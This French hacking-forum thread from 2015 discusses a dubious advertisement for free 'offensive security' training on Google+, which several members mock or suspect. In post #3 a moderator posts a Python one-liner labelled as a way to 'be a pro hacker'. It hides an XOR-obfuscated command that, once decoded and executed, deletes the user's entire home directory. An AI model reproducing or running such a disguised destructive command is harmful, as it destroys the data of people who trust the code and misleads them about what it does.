Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-07-2015 12:05:23

twisterblack
N00b

Formation en sécurité informatique offensive

Bonjour tous le monde !

Vous rêvez de devenir un hacker professionnel, vous êtes passionné par la sécurité informatique & les nouvelles technologies, vous souhaitez en faire votre métier, mais vous ne savez pas par où commencer ou vous disposez de peu d'informations sur le sujet ? 

Une seule adresse : https://plus.google.com/u/0/communities … 3342158511

Des formations complètes régulièrement mis au gout du jour, comprenant théorie & pratique, d'outils (zéro-day) réservé exclusivement à la communauté, de ressources numérique, d'un hangout communautaire & de challenges repoussant toujours plus vos limites le tout gratuitement.

Alors rejoignez nous dès à présent & réalisez vos rêves ...

Bienvenue dans l'underground, Bienvenue dans la matrice Néo !

Dernière modification par twisterblack (27-07-2015 12:06:39)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-07-2015 16:12:03

le dirdir
Membre d'Or

Re : Formation en sécurité informatique offensive

Salut.

Comment peut-on parler d'underground ou de zero day en utilisant google plus ?

Tant vaut l'antenne, tant vaut le poste

#3 27-07-2015 17:40:02

spawn
Modérateur

not rekt : [ ]
rekt : [x]

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 05-08-2015 23:07:15

M1ck3y
Administrateur
Lieu : Lost in the darkness

Sans vouloir remettre en question ton projet, si tu veux avoir l'air un minimum sérieux ne laisse pas en ligne ce genre de chose: http://formation-hacking.e-monsite.com/ . Avoir un site sur ce genre d'hébergement gratuit, ça fait vraiment trop amateur, si tu veux lancer ton projet sérieusement tu dois impérativement investir dans un hébergement, ça ne coute pas bien cher.

#5 07-08-2015 12:54:39

mythnick
N00b

twisterblack a écrit :

Bonjour tous le monde !

Vous rêvez de devenir un hacker professionnel, vous êtes passionné par la sécurité informatique & les nouvelles technologies, vous souhaitez en faire votre métier, mais vous ne savez pas par où commencer ou vous disposez de peu d'informations sur le sujet ? 

Une seule adresse : https://plus.google.com/u/0/communities … 3342158511

Des formations complètes régulièrement mis au gout du jour, comprenant théorie & pratique, d'outils (zéro-day) réservé exclusivement à la communauté, de ressources numérique, d'un hangout communautaire & de challenges repoussant toujours plus vos limites le tout gratuitement.

Alors rejoignez nous dès à présent & réalisez vos rêves ...

Bienvenue dans l'underground, Bienvenue dans la matrice Néo !

Cela ne fait pas un peu publicité commerciale avec un but en réalité peu bénéfique à ces "futurs hackers pro" ?...
Ca sent le repérage à plein nez...

#6 07-08-2015 13:11:55

le dirdir
Membre d'Or

À moins que ce ne soit juste de la pub pour sa chaine youtube ?

Tant vaut l'antenne, tant vaut le poste

#7 07-08-2015 20:14:46

Furyo
Membre Irremplaçable
Site Web

lol

Moi, qui est toujours rêver de devenir un Hacker PROFESSIONNEL...

J'arrive à peine à hacker l'étiquette de mon pot de yaourt pour l'ouvrir... M'en vais m'y inscrire de ce pas!!!

lol

Si vous venez à me chercher, vous savez que je suis au rayon laitage! lol

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]